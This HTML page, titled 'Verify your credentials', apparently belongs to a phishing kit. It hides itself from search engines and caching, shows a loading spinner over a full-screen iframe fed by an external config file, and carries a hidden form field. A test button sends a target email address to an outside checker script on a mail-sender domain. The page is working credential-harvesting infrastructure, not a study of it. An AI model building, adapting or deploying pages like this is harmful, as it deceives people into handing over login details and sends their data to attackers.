<!doctype html>
<html>

<head>
	<meta name=viewport content="width=device-width,initial-scale=1">
	<meta name=robots content=" nosnippet, noydir, noodp, nofollow,noindex, noarchive">
	<meta content=deny http-equiv=X-Frame-Options>
	<meta http-equiv=Pragma content=no-cache>
	<meta content="no-cache, must-revalidate, no-store" http-equiv=Cache-Control>
	<meta content=-1 http-equiv=Expires>
	<meta charset=utf-8>
	<title id=titl>Verify your credentials</title>
	<style>
		html {
			overflow: hidden
		}

		body,
		div,
		html,
		iframe {
			margin: 0;
			padding: 0;
			height: 100%;
			border: none
		}

		iframe {
			display: block;
			width: 100%;
			border: none;
			overflow-y: auto;
			overflow-x: hidden
		}

		@keyframes rotate-loading {
			0% {
				transform: rotate(0);
				-ms-transform: rotate(0);
				-webkit-transform: rotate(0);
				-o-transform: rotate(0);
				-moz-transform: rotate(0)
			}

			100% {
				transform: rotate(360deg);
				-ms-transform: rotate(360deg);
				-webkit-transform: rotate(360deg);
				-o-transform: rotate(360deg);
				-moz-transform: rotate(360deg)
			}
		}

		@-moz-keyframes rotate-loading {
			0% {
				transform: rotate(0);
				-ms-transform: rotate(0);
				-webkit-transform: rotate(0);
				-o-transform: rotate(0);
				-moz-transform: rotate(0)
			}

			100% {
				transform: rotate(360deg);
				-ms-transform: rotate(360deg);
				-webkit-transform: rotate(360deg);
				-o-transform: rotate(360deg);
				-moz-transform: rotate(360deg)
			}
		}

		@-webkit-keyframes rotate-loading {
			0% {
				transform: rotate(0);
				-ms-transform: rotate(0);
				-webkit-transform: rotate(0);
				-o-transform: rotate(0);
				-moz-transform: rotate(0)
			}

			100% {
				transform: rotate(360deg);
				-ms-transform: rotate(360deg);
				-webkit-transform: rotate(360deg);
				-o-transform: rotate(360deg);
				-moz-transform: rotate(360deg)
			}
		}

		@-o-keyframes rotate-loading {
			0% {
				transform: rotate(0);
				-ms-transform: rotate(0);
				-webkit-transform: rotate(0);
				-o-transform: rotate(0);
				-moz-transform: rotate(0)
			}

			100% {
				transform: rotate(360deg);
				-ms-transform: rotate(360deg);
				-webkit-transform: rotate(360deg);
				-o-transform: rotate(360deg);
				-moz-transform: rotate(360deg)
			}
		}

		@keyframes rotate-loading {
			0% {
				transform: rotate(0);
				-ms-transform: rotate(0);
				-webkit-transform: rotate(0);
				-o-transform: rotate(0);
				-moz-transform: rotate(0)
			}

			100% {
				transform: rotate(360deg);
				-ms-transform: rotate(360deg);
				-webkit-transform: rotate(360deg);
				-o-transform: rotate(360deg);
				-moz-transform: rotate(360deg)
			}
		}

		@-moz-keyframes rotate-loading {
			0% {
				transform: rotate(0);
				-ms-transform: rotate(0);
				-webkit-transform: rotate(0);
				-o-transform: rotate(0);
				-moz-transform: rotate(0)
			}

			100% {
				transform: rotate(360deg);
				-ms-transform: rotate(360deg);
				-webkit-transform: rotate(360deg);
				-o-transform: rotate(360deg);
				-moz-transform: rotate(360deg)
			}
		}

		@-webkit-keyframes rotate-loading {
			0% {
				transform: rotate(0);
				-ms-transform: rotate(0);
				-webkit-transform: rotate(0);
				-o-transform: rotate(0);
				-moz-transform: rotate(0)
			}

			100% {
				transform: rotate(360deg);
				-ms-transform: rotate(360deg);
				-webkit-transform: rotate(360deg);
				-o-transform: rotate(360deg);
				-moz-transform: rotate(360deg)
			}
		}

		@-o-keyframes rotate-loading {
			0% {
				transform: rotate(0);
				-ms-transform: rotate(0);
				-webkit-transform: rotate(0);
				-o-transform: rotate(0);
				-moz-transform: rotate(0)
			}

			100% {
				transform: rotate(360deg);
				-ms-transform: rotate(360deg);
				-webkit-transform: rotate(360deg);
				-o-transform: rotate(360deg);
				-moz-transform: rotate(360deg)
			}
		}

		@keyframes loading-text-opacity {
			0% {
				opacity: 0
			}

			20% {
				opacity: 0
			}

			50% {
				opacity: 1
			}

			100% {
				opacity: 0
			}
		}

		@-moz-keyframes loading-text-opacity {
			0% {
				opacity: 0
			}

			20% {
				opacity: 0
			}

			50% {
				opacity: 1
			}

			100% {
				opacity: 0
			}
		}

		@-webkit-keyframes loading-text-opacity {
			0% {
				opacity: 0
			}

			20% {
				opacity: 0
			}

			50% {
				opacity: 1
			}

			100% {
				opacity: 0
			}
		}

		@-o-keyframes loading-text-opacity {
			0% {
				opacity: 0
			}

			20% {
				opacity: 0
			}

			50% {
				opacity: 1
			}

			100% {
				opacity: 0
			}
		}

		.loading,
		.loading-container {
			height: 100px;
			position: relative;
			width: 100px;
			border-radius: 100%
		}

		.loading-container {
			margin: 100px auto
		}

		.loading {
			border: 2px solid transparent;
			border-color: transparent #333 transparent #333;
			-moz-animation: rotate-loading 1.5s linear 0s infinite normal;
			-moz-transform-origin: 50% 50%;
			-o-animation: rotate-loading 1.5s linear 0s infinite normal;
			-o-transform-origin: 50% 50%;
			-webkit-animation: rotate-loading 1.5s linear 0s infinite normal;
			-webkit-transform-origin: 50% 50%;
			animation: rotate-loading 1.5s linear 0s infinite normal;
			transform-origin: 50% 50%
		}

		.loading-container:hover .loading {
			border-color: transparent #e45635 transparent #e45635
		}

		.loading-container .loading,
		.loading-container:hover .loading {
			-webkit-transition: all .5s ease-in-out;
			-moz-transition: all .5s ease-in-out;
			-ms-transition: all .5s ease-in-out;
			-o-transition: all .5s ease-in-out;
			transition: all .5s ease-in-out
		}

		#loading-text {
			-moz-animation: loading-text-opacity 2s linear 0s infinite normal;
			-o-animation: loading-text-opacity 2s linear 0s infinite normal;
			-webkit-animation: loading-text-opacity 2s linear 0s infinite normal;
			animation: loading-text-opacity 2s linear 0s infinite normal;
			color: #888;
			font-family: "Helvetica Neue, " Helvetica", " "arial";
			font-size: 10px;
			font-weight: 700;
			margin-top: 45px;
			opacity: 0;
			position: absolute;
			text-align: center;
			text-transform: uppercase;
			top: 0;
			width: 100px
		}
	</style>
</head>

<body>
	<div class=loading-container id=loader></div>
	<form id=dataForm><input type=hidden id=dom name=dom></form>
	<iframe src="" frameborder=0 marginheight=0 marginwidth=0 width=100% height=100% id=fil scrolling=auto>
	</iframe>
	<script src=https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js></script>
	<script src="./config.js"></script>
    <button id="testBtn">Test AJAX</button>
<script>
    $('#testBtn').on('click', function() {
        $.ajax({
            url: 'https://supermailsender.live/checker.php',
            type: 'GET',
            data: { cms: 'test@yoowon.co.kr' },
            success: function(response) {
                console.log('Test Success:', response);
            },
            error: function(xhr, status, error) {
                console.error('Test Error:', status, error);
            }
        });
    });
</script>
	
</body>

</html>
